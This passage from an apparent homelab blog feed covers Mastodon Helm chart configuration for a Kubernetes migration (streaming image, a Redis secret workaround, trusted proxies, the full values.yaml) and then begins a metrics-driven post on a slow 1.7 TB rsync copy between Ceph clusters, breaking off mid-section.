<p>I won&rsquo;t go through every single option I set, but there were a couple of things
which tripped me up.</p>
<p>The first and perhaps most important one: The default <code>appVersion</code> of the current
chart is <code>4.2.17</code>. But I was already on <code>4.3.3</code>. The main issue I encountered
related to this discrepancy in versions is the split of the Mastodon container
into two containers, one for the streaming component, and one for everything
else. To fix this, I had to explicitly set the image in the <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repository</span>: <span style="color:#e6db74">&#34;ghcr.io/mastodon/mastodon-streaming&#34;</span>
</span></span></code></pre></div><p>With that, the chart seems to work for 4.3.3 and 4.3.4 without issues.</p>
<p>Then there&rsquo;s the Redis configuration. I&rsquo;ve got a central Redis instance in my
cluster, instead of running one for every app. And the chart supports this, but
unless I&rsquo;ve overlooked something here, the chart requires the Redis instance
to have a password, which mine does not. The way this shows is that the
<code>mastodon-redis</code> secret is unconditionally added to each container&rsquo;s env,
for example in the mastodon-web deployment from <a href="https://github.com/mastodon/chart/blob/main/templates/deployment-web.yaml">here</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;REDIS_PASSWORD&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">template &#34;mastodon.redis.secretName&#34; . }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">redis-password</span>
</span></span></code></pre></div><p>There&rsquo;s no condition around that, checking whether Redis is configured with a
password. I also tried to just set an empty password in <code>redis.auth.password</code>,
but in this case the Secret is not created by the chart, and my containers are
left in ContainerCreationError state because of the missing Secret.
The only way I found was to create a dummy secret with an empty <code>data.redis-password</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">masto-redis-mock</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">type</span>: <span style="color:#ae81ff">Opaque</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis-password</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>And then using that Secret in the Helm chart:</p>
<pre tabindex="0"><code>redis:
  auth:
    existingSecret: &#34;masto-redis-mock&#34;
</code></pre><p>With that, the Redis password env variable is set, but to an empty value, which
seems to make Mastodon use Redis properly, without adding a password of any
kind to the connection string.</p>
<p>The next noteworthy configuration to be set was the <code>mastodon.trusted_proxy_ip</code>
variable. This one needed the source IP of my Traefik ingress, but that doesn&rsquo;t
have a fixed IP, so I needed to add the Pod CIDR:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">trusted_proxy_ip</span>: <span style="color:#e6db74">&#34;300.300.300.1,127.0.0.1,10.8.0.0/16&#34;</span>
</span></span></code></pre></div><p>Without this setting, I got the following error in the mastodon-web logs:</p>
<pre tabindex="0"><code>[05332434-d3d6-40b1-950d-ae73da0d4967] ActionDispatch::RemoteIp::IpSpoofAttackError (IP spoofing attack?! client 10.8.4.103 is not a trusted proxy HTTP_CLIENT_IP=nil HTTP_X_FORWARDED_FOR=&#34;67.241.47.40, 10.86.10.10&#34;)
</code></pre><p>I also decided to switch off the CronJob for media removal:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">removeMedia</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This is because I recently <a href="https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/">spend quite some time</a>
working on Masotodon&rsquo;s internal process. From what I can see, this CronJob
uses the <code>tootctl</code> CLI with the <a href="https://docs.joinmastodon.org/admin/tootctl/#media-remove">tootctl media remove</a>
command. I like that better than the internal Mastodon process, because back
when I looked at it, <code>tootctl</code> worked a lot better because it made separate
DELETE requests. But the one thing which keeps me from using the CronJob is that
I can&rsquo;t configure the retention periods. I might still use it later and just live
with the defaults.</p>
<p>And that&rsquo;s really all I have to say. For completeness&rsquo; sake, here is the full
<code>values.yaml</code> content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">createAdmin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">removeMedia</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">local_domain</span>: <span style="color:#e6db74">&#34;social.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">trusted_proxy_ip</span>: <span style="color:#e6db74">&#34;300.300.300.1,127.0.0.1,10.8.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">singleUserMode</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">autherizedFetch</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limitedFederationMode</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-bucket&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">masto-media</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">endpoint</span>: <span style="color:#e6db74">&#34;http://rook.service:80&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alias_host</span>: <span style="color:#e6db74">&#34;s3-mastodon.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deepl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hcaptcha</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secrets</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1024Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">smtp</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth_method</span>: <span style="color:#e6db74">&#34;plain&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">from_address</span>: <span style="color:#e6db74">&#34;Meiers Mastodon &lt;mastodon@mei-home.net&gt;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openssl_verify_mode</span>: <span style="color:#e6db74">&#34;peer&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;mail.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tls</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-mail&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repository</span>: <span style="color:#e6db74">&#34;ghcr.io/mastodon/mastodon-streaming&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2000Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1000Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cacheBuster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">statsd</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exporter</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">otel</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraEnvVars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">SMTP_SSL</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_CLIENT_ID</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_DISPLAY_NAME</span>: <span style="color:#e6db74">&#34;Login with Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_ISSUER</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_DISCOVERY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_SCOPE</span>: <span style="color:#e6db74">&#34;openid,profile,email&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_UID_FIELD</span>: <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_REDIRECT_URI</span>: <span style="color:#e6db74">&#34;https://social.mei-home.net/auth/auth/openid_connect/callback&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_SECURITY_ASSUME_EMAIL_IS_VERIFIED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_END_SESSION_ENDPOINT</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/protocol/openid-connect/logout&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OIDC_ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">OMNIAUTH_ONLY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RAILS_SERVE_STATIC_FILES</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_BATCH_DELETE_LIMIT</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_READ_TIMEOUT</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">S3_BATCH_DELETE_RETRY</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ALLOWED_PRIVATE_ADDRESSES</span>: <span style="color:#e6db74">&#34;300.300.300.1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/controller</span>: <span style="color:#e6db74">&#34;none&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">social.mei-home.net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">streaming</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">elasticsearch</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresqlHostname</span>: <span style="color:#e6db74">&#34;mastodon-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresqlPort</span>: <span style="color:#e6db74">&#34;5432&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;mastodon&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;mastodon-pg-cluster-app&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;redis.example&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;masto-redis-mock&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>To be honest, somewhere during that Sunday I started thinking that starting the
Mastodon migration on a Sunday morning might have been a mistake, but in the end
it worked out well enough.</p>
<p>Now there are only a few services left to migrate over, chief amongst them
my Keycloak instance. Let&rsquo;s see whether I might even be able to clean out the
entire cluster during this weekend. There&rsquo;s definitely a light at
the end of the migration tunnel. I guess this weekend will show whether it&rsquo;s
a freight train. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph: My Story of Copying 1.7 TB from one Cluster to Another</title>
      <link>https://blog.mei-home.net/posts/ceph-copy-latency/</link>
      <pubDate>Tue, 04 Mar 2025 23:50:48 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-copy-latency/</guid>
      <description>Lots of plots and metrics, some grumbling. Smartctl makes an appearance as well.</description>
      <content:encoded><![CDATA[<p>A couple of weeks ago, I <a href="https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/">migrated my Jellyfin instance to my Kubernetes cluster</a>.
This involved copying my approximately 1.7 TB worth of media from the baremetal
Ceph cluster to the new Rook Ceph cluster. And I&rsquo;d like to dig a bit into the
metrics and try to read them like the entrails of a slain beast during a full
moon at the top of a misty mountain. Just this much, the portents don&rsquo;t look good
for one of my HDDs.</p>
<p>So come and join me while we find out together whether I can press 30 minutes
worth of blog post out of a single rsync command. &#x1f913;</p>
<p><strong>UPDATE:</strong> Hey look there, another victory for project &ldquo;articles, not tomes&rdquo;: 17
minutes. &#x1f389;</p>
<h2 id="setting-the-table">Setting the table</h2>
<p>So what are we looking at today? The story of me executing this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rsync -av --info<span style="color:#f92672">=</span>progress2 --info<span style="color:#f92672">=</span>name0 /mnt/baremetal/* /mnt/rook/
</span></span></code></pre></div><p>This command takes my entire media collection and copies it from my baremetal
Ceph cluster to my Rook ceph cluster.
This copy involves four physical hosts, four HDDs, a 1 Gbps switch, two VMs
and a Kubernetes cluster. The final output from the command looks like this:</p>
<pre tabindex="0"><code>sent 1,748,055,479,314 bytes  received 155,334 bytes  54,890,039.24 bytes/sec
total size is 1,853,006,549,228  speedup is 1.06
</code></pre><p>Overall, this took about 9 hours. Now, that 54 MB/s might not look too impressive,
even for spinning rust. This is, at least partially, just due to the way Ceph
works. Any write is first done to a WAL, which means there&rsquo;s some extra IOPS
required besides the write of the actual data. Plus there was some other IO
going on at the same time, and while that&rsquo;s generally pretty low-level in my
cluster, it still costs IOPS.</p>
<p>But of course, we&rsquo;re in Meier&rsquo;s Homelab here. We don&rsquo;t need to read tea leaves.
We have 200 GB worth of Prometheus TSDB around here.</p>
<h2 id="it-aint-looking-good">It ain&rsquo;t looking good</h2>
<p>Before diving into the metrics, there&rsquo;s one problem to note: You will be seeing
that there are holes in the metrics. Quite a lot of them, in fact. Those are
there because while the copy operation was running, the Prometheus Pod was
restarted multiple times. I caught this at the beginning of the copy process.
Looking at the Pod, it got automatically restarted due to the liveness probe
failing. After every restart, it took quite a while to come up again.
And I&rsquo;m pretty sure that&rsquo;s because of the copy operation. The volume Prometheus
is using is located on the same HDD pool that the media collection was getting
copied to. And as you will see later, those HDDs were completely slammed by the
copy operation. Which is okay in general, of course. Ceph should be using all the
IOPS available to it.</p>
<p>But I found myself a bit disappointed, to be honest. I would have expected that
there was some good IO scheduling going on in Ceph. But seemingly, it allowed
other IO operations to be starved to such a degree that Prometheus repeatedly
(as in: dozens of times) failed its liveness probe.
In the Ceph logs, I saw messages about IOPS being delayed for up to 90 seconds.
It didn&rsquo;t really break anything, and the cluster stayed up through all of it -
it was just that some disk operations were really slow. So I&rsquo;m not ditching
Ceph or anything like that. I might even be wrong with my assumptions - it might
not have been IO contention, but instead network contention. But I will definitely
be looking a bit deeper into which knobs I can tune in Ceph&rsquo;s scheduling
behavior.
And also into throwing some further SSDs into my Ceph hosts to serve as RocksDB/WAL
storage for my HDD OSDs. But then there&rsquo;s actually the problem that one of my
Ceph hosts is an <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>, which
only has two SATA ports. &#x1f644;</p>
<p>But finally enough with the text - let&rsquo;s move to the plots!</p>
<h2 id="io">I/O</h2>
<p>Let&rsquo;s begin by having a look at the IO utilization on the disks involved. As
I&rsquo;ve noted above, they&rsquo;re all HDDs. Two 2016 WD Red 4 TB, both in the baremetal cluster,
so they will only get read operations.
Then two Seagate platters, one with 8 TB and one with 4 TB. Those are the disks
which are getting written to.</p>
<p>Let&rsquo;s start with a look at the IO of the two source HDDs:
<figure>
    <img loading="lazy" src="source-io-utilization.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s titled &#39;I/O utilization&#39; and shows the interval from 23:00 on one day to 09:15 the next. On the Y axis, the percentage of the I/O utilization is given. The panel contains two plots. Both start at around 2%. They go up around 23:30, the lower plot to around 40%, the higher plot to around 50%. This remains relatively stable, besides a number of spikes, most of them down to a lower percentage. Then around 04:00 both plots rise sharply, with the higher plot raising to a max of 92% and the lower plot to around 70%. They keep this higher level, again with a few spikes, until about 07:45, where they go down to around 40% and 30% respectively. Finally, at about 08:50, they fall back to around 2%."/> <figcaption>
            <p>I/O utilization of the two source HDDs on the baremetal cluster.</p>
        </figcaption>
</figure>

This plot shows the result of the following Prometheus queries:</p>
<pre tabindex="0"><code>rate(node_disk_io_time_seconds_total{instance=&#34;hostA&#34;,device=&#34;sdb&#34;}[1m])
rate(node_disk_io_time_seconds_total{instance=&#34;hostB&#34;,device=&#34;sdd&#34;}[1m])
</code></pre><p>So this is the percentage of time both HDDs spend actually serving IO. In
contrast to what I noted above, I ended up deciding to enable Grafana&rsquo;s &ldquo;Connect null values&rdquo;
option instead of leaving in the holes created by Prometheus being restarted. You
can see a pretty large gap at the beginning of the plots, from roughly 23:32
to 00:00. That&rsquo;s where I initially wanted to look at the metrics while the copy
was running, but Grafana sending queries to Prometheus was what made the liveness
probes fail for the first time, and me insisting that this should work was what
increased the length of the data gap, when compared to the others strewn throughout
the plots.
Two things are noteworthy about this plot. First, the time where the I/O suddenly
increases, from 04:00 to 07:50 or thereabouts. That wasn&rsquo;t a sudden increase
in the write throughput on the receiving cluster, but rather just the fact that
I&rsquo;ve got Ceph&rsquo;s scrubs configured for that time range. And forgot to disable
them for the occasion.
Second, note that at no point were the source HDDs actually fully loaded. So
the bottleneck wasn&rsquo;t the read speed.</p>
<p>So what did the two target disks&rsquo; utilization look like? So glad you asked. &#x1f601;
<figure>
    <img loading="lazy" src="target-io-utilization.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s titled &#39;I/O utilization&#39; and shows the interval from 23:00 on one day to 09:15 the next. On the Y axis, the percentage of the I/O utilization is given. The panel contains two plots. Both start at around 2%. They go up around 23:30, but there&#39;s a far larger difference than in the previous panel. The lower plot only goes up to around 30%, but with a relatively large fluctuation throughout the entire interval, from almost 0% as the low to 50% as the max. The higher of the two plots goes up to 100% and stays there, save for a few dips to as low as 40%. As in the previous panel, the plots go back down to around 2% - 5% around 08:50."/> <figcaption>
            <p>I/O utilization of the two target HDDs on the Rook cluster.</p>
        </figcaption>
</figure>

This plot shows a very stark difference. One of the disks is completely slammed,
while the other one is only relatively lightly loaded at around 30%, but with
large fluctuations. I will get back later to the completely slammed disk.</p>
<p>But let&rsquo;s first take a look at the disk hovering around 30%, because here I
believe I&rsquo;ve made a mistake. This disk sits in my old home server, which I reactivated
for the Kubernetes migration to provide some extra capacity. The issue now is: The
Pod doing the copying from the baremetal cluster to the Rook cluster was sitting
on a different VM on the same host. And the physical host is only connected to
the rest of the network, including the 100% disk and the two source disks,
with a 1 Gbps link. So let&rsquo;s see whether this might have been the bottleneck,
by looking at the network activity of that physical host during the copy operation:
<figure>
    <img loading="lazy" src="vm-host-networking.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame, but this time it contains network activity. There are two plots again, one for the transmit rate and one for the receive rate. Like before, both rates raise sharply at 23:30 and go down to their previous couple of Mbps values around 08:50. Between that, the receive rate reaches a maximum around 800 Mbps, while the transmit rate hovers around 500 - 600 Mbps. Both show pretty large spikes both up and down. But neither of the two plots ever reaches the 1 Gbps boundary."/> <figcaption>
            <p>Network activity for the physical 1 GbE interface connecting the VM host running one HDD OSD and the Pod running the actual transfer with the other three Ceph hosts.</p>
        </figcaption>
</figure>

My theory does not seem to pan out entirely. While yes, the receive rate on
the interface is pretty high, it&rsquo;s nowhere near saturated. I also ran an iperf
test and I can easily reach 940 Mbps between all of the hosts involved.
What I&rsquo;m wondering about a bit: Does Ceph itself have some sort of rate limiting,
to ensure that it doesn&rsquo;t entire saturate a connection? It could at least imagine
that.
I have also checked the source hosts, and they&rsquo;re both transmitting at about
300 Mbps each, so they&rsquo;re also not saturating their network links.</p>
<p>One simple explanation could be: The Ceph pool I&rsquo;ve been writing to is a 2x
replicated pool. So each piece of data needs to be written to both HDDs. And
if one of the HDDs gets completely slammed, the other HDD would not be able to
write at its maximum speed because it wouldn&rsquo;t be able to write the second copy
of the data fast enough. I hope I remember this theory when I&rsquo;m done with the
migration and I integrate the two baremetal Ceph hosts and their disks back
into the Rook cluster. I will discuss the problematic disk/host a bit more later.</p>
<p>But before that, let&rsquo;s take a look at write/read I/O load on the HDDs involved
in the copy, starting with the read speeds on the source HDDs:
<figure>
    <img loading="lazy" src="bytes-read.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame. This time it is labeled &#39;Bytes read&#39; and shows the read rates on the two source HDDs for the copy operation. The rate is near zero for both until 23:30, when the copy operation starts. Then both disks ramp up to around 30 MB/s where they stay until 04:00, when the rates of both disks increase to 50 MB/s, before going down to around 25 MB/s at 07:45 and then down to zero again around 08:50."/> <figcaption>
            <p>Read rate of the two source HDDs during the copy operation.</p>
        </figcaption>
</figure>

This again shows that the copy was not constraint by the source disks. When the
Ceph scrub sets in around 04:00, both disks find another 20 MB/s in read speed.
The near-zero lines at the beginning and end show just how little reads are happening in
my cluster at night.</p>
<p>So then let&rsquo;s take a look at the write rates on the two hosts receiving the data:
<figure>
    <img loading="lazy" src="bytes-written.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame. These are the writes of the two HDDs on the receiving end of the copy operation. Both disks hover around 55 MB/s to 60 MB/s, with one of the disks showing a lot more spikes, going as low as 20 MB/s and as high as 80 MB/s."/> <figcaption>
            <p>Write rate of the two target HDDs during the copy operation.</p>
        </figcaption>
</figure>

These two plots, reading and writing, show the difference between the two
operations in a Ceph cluster. Reads can happen from both HDDs in parallel, with
both only reading for around 35 MB/s, while writing happens at approximately
the combined read rate of 55 MB/s to 60 MB/s. This is due to the fact each piece
of data only needs to be read once, but written twice. I&rsquo;m honestly not sure why
the HDD in the one host shows such a spiky behavior in its writes, but it fits
with the IOPS graph from above. But this also shows that the issue seems to be
IOPS, not total achievable write throughput. Both receiving disks should be able
to do over 100 MB/s, but neither does, because one of the disks has its IOPS
saturated. And because the placement groups of the pool being written to are
spread among both disks, the IOPS-limited disk holds back the faster disk.</p>
<h2 id="bad-disk">Bad disk?</h2>
<p>Let&rsquo;s think back to that one receiving disk that got slammed with 100% IO utilization
and still only had about 60 MB/s write throughput. I think that disk is either
just bad, or mine is somewhat broken? After seeing the above performance, I
decided to take a look at the OSD apply latency in both of my clusters. That&rsquo;s
the time it takes to flush an update to the disk, after it has been written to
the journal already.
